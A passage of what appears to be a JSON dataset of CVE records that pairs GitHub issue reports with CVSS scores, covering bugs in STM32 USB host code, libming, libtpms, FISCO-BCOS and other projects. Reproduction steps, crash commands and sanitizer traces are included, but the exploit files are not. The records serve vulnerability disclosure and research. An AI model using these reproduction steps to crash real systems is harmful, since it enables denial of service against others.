        "description": "Buffer Overflow due to the variable if_descriptor APITAG Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG if_descriptor, uint8_t buf) Location: URLTAG Type: Buffer Overflow Result: The system could be configured incorrectly with wrong parameters. Description: The function APITAG parse interface descriptor. It\u2019s called by the function APITAG as shown in URLTAG It doesn\u2019t check the validity of the variable if_descriptor APITAG compared with the total length of the input buffer which may cause a buffer overflow by the following called function APITAG as shown in URLTAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet. FILETAG Additional context To patch it, the program should check if reach the end of the input buffer when plus if_descriptor APITAG",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2021-34261",
        "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/78",
        "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/78",
        "Repo_new": "stmicroelectronics/stm32cubeh7",
        "Issue_Created_At": "2020-10-14T22:46:03Z",
        "description": "Lack hardware wake up support checking. Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG cfg_desc, uint8_t buf, uint NUMBERTAG t length) Location: URLTAG Type: Denial of Service. Result: The system will hang when trying to set a remote wake up feature. Description: The function APITAG parses the configuration descriptor, interface descriptor, and endpoint descriptor by input data from a USB device. And it set the variable cfg_desc APITAG by the input data from the USB device. This variable will be used as part of a judgment in the function APITAG as shown in URLTAG With a malformed value, the remote wakeup may be enabled as shown in URLTAG If the hardware doesn\u2019t support this feature, the system will hang due to a FAIL return value by the function APITAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet Additional context To patch it, the program should check if the hardware supports a remote wake up FILETAG feature.",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.6,
        "impactScore": 3.6,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2021-34262",
        "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/81",
        "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/81",
        "Repo_new": "stmicroelectronics/stm32cubeh7",
        "Issue_Created_At": "2020-10-14T22:57:52Z",
        "description": "No checking if ep_descriptor APITAG is greater than zero. Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG ep_descriptor, uint8_t buf) Location: URLTAG Type: Denial of Service. Result: The system will hang when try to communicate with the endpoint. Description: The function APITAG parses the endpoint descriptor of a USB device. It doesn\u2019t check if the variable ep_descriptor APITAG is greater than zero as shown in URLTAG If zero, the MSC handler will not able to communicate with the outside world as shown from line NUMBERTAG to line NUMBERTAG in FILETAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet. FILETAG Additional context To patch it, the program should check if ep_descriptor APITAG is greater than zero.",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2021-34267",
        "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/80",
        "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/80",
        "Repo_new": "stmicroelectronics/stm32cubeh7",
        "Issue_Created_At": "2020-10-14T22:56:01Z",
        "description": "No checking on both IN and OUT pipe constructed. Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static APITAG APITAG phost) Location: From line NUMBERTAG to line NUMBERTAG in FILETAG Type: Denial of Service. Result: The system will hang when try to communicate with the endpoint. Description: The function APITAG inits the status of MSC handler. It initializes the IN endpoint and OUT endpoint as shown from line NUMBERTAG to line NUMBERTAG in FILETAG However, when the variable APITAG of endpoint descriptor are both masked as IN or OUT without checking as shown in URLTAG the MSC handler will also only initialize the IN or OUT part as shown from line NUMBERTAG to line NUMBERTAG in FILETAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet. FILETAG Additional context To patch it, the program should check both IN and OUT pipe is constructed.",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.6,
        "impactScore": 3.6,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2021-34268",
        "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/75",
        "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/75",
        "Repo_new": "stmicroelectronics/stm32cubeh7",
        "Issue_Created_At": "2020-10-14T22:33:50Z",
        "description": "No validity chekcing on dev_desc APITAG Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG dev_desc, uint8_t buf, uint NUMBERTAG t length) Location: URLTAG Type: Denial of Service. Result: A malformed USB device packet may cause the system hang when it tries to communicate with the outside world. Description: The function APITAG parses the device descriptor by input data from a USB device. The valid max packet size of the device descriptor should be NUMBERTAG and NUMBERTAG as USB specification required. However, the function APITAG doesn\u2019t check the value of dev_desc APITAG as shown in URLTAG The variable dev_desc APITAG will be used as the size to construct the control pipe between host and device as shown in URLTAG If APITAG is zero, the firmware will get the error status USBH_FAIL in the function APITAG called by the function APITAG when trying to communicate with the outside world by IN and OUT pipe in the future and the host will try to re enumerate. This process will loop again and again. How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a usb disk NUMBERTAG Use the attached FILETAG to replace USB device packet Additional context If you have a first analysis or patch correction, thank you to share your proposal. To patch it, the program should check if dev_desc APITAG is equal to NUMBERTAG or NUMBERTAG At least, it should be greater than zero. FILETAG",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.6,
        "impactScore": 3.6,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2021-34338",
        "Issue_Url_old": "https://github.com/libming/libming/issues/201",
        "Issue_Url_new": "https://github.com/libming/libming/issues/201",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2020-08-24T13:27:16Z",
        "description": "Segmentation fault in function APITAG APITAG Hi, there. There is a segmentation fault in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG ef NUMBERTAG bp NUMBERTAG c NUMBERTAG fb sp NUMBERTAG ffee NUMBERTAG T NUMBERTAG ef NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG b in APITAG PATHTAG NUMBERTAG b NUMBERTAG b in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG d9 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ The cause is due to the incomplete check in line NUMBERTAG mentioned in the Figure. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-34339",
        "Issue_Url_old": "https://github.com/libming/libming/issues/202",
        "Issue_Url_new": "https://github.com/libming/libming/issues/202",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2020-08-24T13:33:55Z",
        "description": "Segmentation fault in function APITAG APITAG Hi, there. There is a segmentation fault in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG d8dc bp NUMBERTAG fffd NUMBERTAG f NUMBERTAG sp NUMBERTAG ffe NUMBERTAG f8bb0 T NUMBERTAG d8db in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG d9 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fe9f9c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ The cause is due to the uncheck index of act APITAG mentioned in Figure. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-34340",
        "Issue_Url_old": "https://github.com/libming/libming/issues/203",
        "Issue_Url_new": "https://github.com/libming/libming/issues/203",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2020-08-25T10:33:55Z",
        "description": "Segmentation fault in function APITAG decompile.c NUMBERTAG Hi, there. There is a segmentation fault in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG c bp NUMBERTAG f0 sp NUMBERTAG ffdbd NUMBERTAG ccf0 T NUMBERTAG b in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG d9 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fd NUMBERTAG eb NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ The cause might due to the incomplete check related to the index for array regs. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-34341",
        "Issue_Url_old": "https://github.com/libming/libming/issues/204",
        "Issue_Url_new": "https://github.com/libming/libming/issues/204",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2020-08-25T10:45:49Z",
        "description": "Buffer overflow in APITAG APITAG Hi, there. There is a buffer overflow in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG dc NUMBERTAG at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffd NUMBERTAG c NUMBERTAG sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e NUMBERTAG dc NUMBERTAG thread T NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG c5c in APITAG PATHTAG NUMBERTAG c5c in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG c NUMBERTAG b in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f8b NUMBERTAG e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG e NUMBERTAG dc NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f8b NUMBERTAG fa in __interceptor_calloc ( PATHTAG NUMBERTAG e4cc in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG c1c7fff9b NUMBERTAG fa[fa]fa fa fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c1c7fff9ba0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa NUMBERTAG c1c7fff9bb0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c1c7fff9bc0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9bd NUMBERTAG c1c7fff9be NUMBERTAG fa fa fa fa fa fa fa fa fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~~",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-34342",
        "Issue_Url_old": "https://github.com/libming/libming/issues/205",
        "Issue_Url_new": "https://github.com/libming/libming/issues/205",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2020-08-25T10:55:36Z",
        "description": "Buffer overflow in APITAG APITAG Hi, there. There is a buffer overflow in the newest master branch NUMBERTAG aee NUMBERTAG which causes a huge memory information leakage. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f2f NUMBERTAG b bp NUMBERTAG ffcf NUMBERTAG sp NUMBERTAG ffcf NUMBERTAG b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f2f NUMBERTAG a in strlen ( PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG db7 in APITAG PATHTAG NUMBERTAG db7 in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG c NUMBERTAG b in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f2f NUMBERTAG cc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f2f NUMBERTAG c1 in realloc ( PATHTAG NUMBERTAG b7b in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG strlen Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffcc NUMBERTAG c NUMBERTAG fffcc NUMBERTAG c NUMBERTAG fffcca NUMBERTAG c NUMBERTAG fffccb NUMBERTAG c NUMBERTAG fffccc NUMBERTAG c NUMBERTAG fffccd0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffcce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffccf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffcd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffcd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffcd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~~",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-34539",
        "Issue_Url_old": "https://github.com/CubeCoders/AMP/issues/464",
        "Issue_Url_new": "https://github.com/cubecoders/amp/issues/464",
        "Repo_new": "cubecoders/amp",
        "Issue_Created_At": "2021-06-10T09:46:57Z",
        "description": "Security: Insufficient validation on Java Version setting.. This was originally reported by Joel Frederick Lewis We are awaiting a CVE number for this issue. Bug Report System Information Windows, Linux PATHTAG B2 Development I confirm: [x] that I have searched for an existing bug report for this issue. [x] that I am using the latest available version of AMP. [x] that my operating system is up to date. Symptoms The APITAG Version' setting within AMP doesn't validate its setting in the way you'd expect for a potentially sensitive setting. Reproduction Alter the path to Java by using the Inspect Element tool in a browser for a given setting. Notes Because of the authentication and permissions requirements (users with this combination would reasonably be expected to have a high level of access to the host) this is regarded as a low risk, but potentially high impact issue. Instances running inside Docker aren't affected in the same way since they would not affect the host system.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-34555",
        "Issue_Url_old": "https://github.com/trusteddomainproject/OpenDMARC/issues/179",
        "Issue_Url_new": "https://github.com/trusteddomainproject/opendmarc/issues/179",
        "Repo_new": "trusteddomainproject/opendmarc",
        "Issue_Created_At": "2021-06-08T09:47:15Z",
        "description": "APITAG NUMBERTAG segfault several times on two VMs, APITAG NUMBERTAG Hi, yesterday and today APITAG has crashed for segfault half a dozen times on two virtual machines, one of them APITAG another APITAG both up to date and have APITAG version NUMBERTAG Until yesterday APITAG has worked fine. Last dmesg info was ERRORTAG Red Hat Abrtd service was running, there is coredump and other files saved by it. Is there some additional information you would need to investigate the issue? The package version is opendmarc NUMBERTAG APITAG on APITAG and opendmarc NUMBERTAG APITAG on APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-34801",
        "Issue_Url_old": "https://github.com/xCss/Valine/issues/366",
        "Issue_Url_new": "https://github.com/xcss/valine/issues/366",
        "Repo_new": "xcss/valine",
        "Issue_Created_At": "2021-06-16T04:11:40Z",
        "description": "Found a fatal bug that can kill the comment system. \u5982\u679c\u60a8\u60f3\u62a5\u544a\u9519\u8bef\uff0c\u8bf7\u63d0\u4f9b\u4ee5\u4e0b\u4fe1\u606f If you want to report a bug, please provide the following information: \u53ef\u590d\u73b0\u95ee\u9898\u7684\u6b65\u9aa4 The steps to reproduce. The latest version of valine is APITAG first look at the effect of normal page loading comments: FILETAG When the commented user UA is incomplete\uff0csuch as\uff1a APITAG FILETAG This will cause the entire comment system of the current page to be damaged and the comments cannot be loaded normally FILETAG \u53ef\u590d\u73b0\u95ee\u9898\u7684\u7f51\u9875\u5730\u5740 FILETAG This website uses the latest version of valine, the comment cannot be loaded normally APITAG Valine NUMBERTAG PATHTAG Browser: APITAG \u603b\u7684\u6765\u8bf4\u5c31\u662f \u5982\u679c\u6709\u7528\u6237\u6076\u610f\u4fee\u6539 UA NUMBERTAG leancloud \u4ece\u91cc\u5230\u5916\u6392\u67e5\u4e86\u4e00\u904d \u624d\u53d1\u73b0\u4e86\u8fd9\u4e2a BUG\uff0c\u5e0c\u671b\u4f5c\u8005\u5927\u5927\u540e\u9762\u53ef\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5c34\u5c2c\u7684\u95ee\u9898",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3496",
        "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/33",
        "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/33",
        "Repo_new": "matthias-wandel/jhead",
        "Issue_Created_At": "2021-04-13T03:00:34Z",
        "description": "FILETAG Verification steps\uff1a APITAG the source code of jhead Edit file makefile CODETAG APITAG the jhead APITAG NUMBERTAG run jhead APITAG asan info ERRORTAG Tanks",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3502",
        "Issue_Url_old": "https://github.com/lathiat/avahi/issues/338",
        "Issue_Url_new": "https://github.com/lathiat/avahi/issues/338",
        "Repo_new": "lathiat/avahi",
        "Issue_Created_At": "2021-04-26T17:05:33Z",
        "description": "eachable assertion in APITAG when trying to resolve badly formatted hostnames ( CVETAG ). Hi An issue was reported in Debian as CVETAG which got CVETAG assigned. Quoting the report: CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-35041",
        "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/1951",
        "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/1951",
        "Repo_new": "fisco-bcos/fisco-bcos",
        "Issue_Created_At": "2021-06-15T12:05:29Z",
        "description": "The node may have a bug when dealing with unformatted packet and lead to a crash. Describe the bug A malicious node can send a packet continuously. The packet is in an incorrect format and cannot be decoded by the node correctly. As a result, the node may consume the memory sustainably, as the flowing figure shows: FILETAG After NUMBERTAG seconds, over NUMBERTAG MB memory has been consumed. If I continue sending the packet, the node will consume all the memory. At last it be killed by the OS. In order to analyze the reason for this bug, I try to debug the code of the node. Here is what I found: First, I found that in the file APITAG , at line NUMBERTAG in the function decode : CODETAG the variable size is NUMBERTAG and the variable APITAG is a very big number under my packet. So the function will return APITAG whose value is NUMBERTAG The variable which accepts the return value is result in APITAG at line NUMBERTAG in the function APITAG : APITAG and the program will enter into a if else cluse: CODETAG Because the value of result is NUMBERTAG so here the program will call the function APITAG recursively. If I delete this call, the problem will not occur anymore. APITAG So I think the reason maybe the developers forget to release certain memory before the return statement if the packet is not decoded correctly! To Reproduce Steps to reproduce the behavior NUMBERTAG Construct a P2P packet which claims to have a big length (set a big value for variable APITAG NUMBERTAG Continuously send the packet to a running node NUMBERTAG The node will consume the memory continuously and crash. Expected behavior By handling the abnormal packets correctly, the memory cost will not sustainably increase and the node will not crash. Screenshots I have give the screenshots of the memory usage of the node in the description part. Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG Additional context None!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3505",
        "Issue_Url_old": "https://github.com/stefanberger/libtpms/issues/183",
        "Issue_Url_new": "https://github.com/stefanberger/libtpms/issues/183",
        "Repo_new": "stefanberger/libtpms",
        "Issue_Created_At": "2021-02-17T11:08:16Z",
        "description": "[libtpms NUMBERTAG APITAG creates prime numbers with NUMBERTAG zeros bits. Describe the bug When running APITAG on swtpm with libtpms NUMBERTAG to generate an RSA NUMBERTAG key, the modulus of the key always contains many zeros in its high bits. By extracting the prime factors from file holding the persistent TPM state, they always have NUMBERTAG bits set to zero. For example: Modulus CODETAG First prime number CODETAG Second prime number CODETAG APITAG the eight APITAG hexdigits after the NUMBERTAG first hexdigits of the prime numbers). This is due to a bug in function APITAG URLTAG The issue is that on NUMBERTAG bit systems, MASK is not APITAG but APITAG when APITAG is NUMBERTAG so only the NUMBERTAG lowest bits of APITAG are kept instead of the NUMBERTAG lowest bits. More precisely, in APITAG , the shift operand should have been APITAG . This bug is present in TCG specification ( APITAG section APITAG ). This specification was updated and the current version does not have this bug ( APITAG section APITAG ). This new version was implemented in April NUMBERTAG in APITAG (branch master ) but no release of libtpms includes the new version yet. Therefore I have three questions: Could APITAG be fixed in branch APITAG so that generating new RSA keys do not use prime numbers with many zeros, on NUMBERTAG bit systems? If no, could a comment be added which clearly state that this prime number generator generates prime numbers that have NUMBERTAG bits always set to zero and that the TCG already fixed this issue in a newer version of APITAG Platform Module Library Family NUMBERTAG Specification Part NUMBERTAG Routines Code\"? When will the next release of libtpms (version APITAG ?) occur? To Reproduce Steps to reproduce the behavior NUMBERTAG On Arch Linux on an NUMBERTAG system, install swtpm , APITAG and APITAG NUMBERTAG Launch swtpm in TPM2 mode and APITAG , for example with: CODETAG NUMBERTAG Generate a persistent RSA key on the software TPM, for example with: CODETAG NUMBERTAG Analyze the content of APITAG to retrieve the modulus and the prime numbers of the generated RSA key. Expected behavior APITAG should create an RSA key with prime numbers which really look random, instead of with NUMBERTAG bits always set to zero. Desktop (please complete the following information): OS: Arch Linux on an NUMBERTAG CPU NUMBERTAG bit system) Versions of relevant components libtpms NUMBERTAG swtpm NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3508",
        "Issue_Url_old": "https://github.com/enferex/pdfresurrect/issues/17",
        "Issue_Url_new": "https://github.com/enferex/pdfresurrect/issues/17",
        "Repo_new": "enferex/pdfresurrect",
        "Issue_Created_At": "2021-04-16T08:58:58Z",
        "description": "Infinite loop in function get_xref_linear_skipped in pdf.c. version NUMBERTAG b commit af NUMBERTAG OS: ubuntu NUMBERTAG CODETAG If found 'trailer' ,then look backwards for 'xref'. But if there isn't character 'x' , the function APITAG will go into an infinite loop. poc(zipped ): FILETAG To reproduct: ./pdfresurrect [poc]",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3514",
        "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/4711",
        "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/4711",
        "Repo_new": "389ds/389-ds-base",
        "Issue_Created_At": "2021-04-01T14:35:42Z",
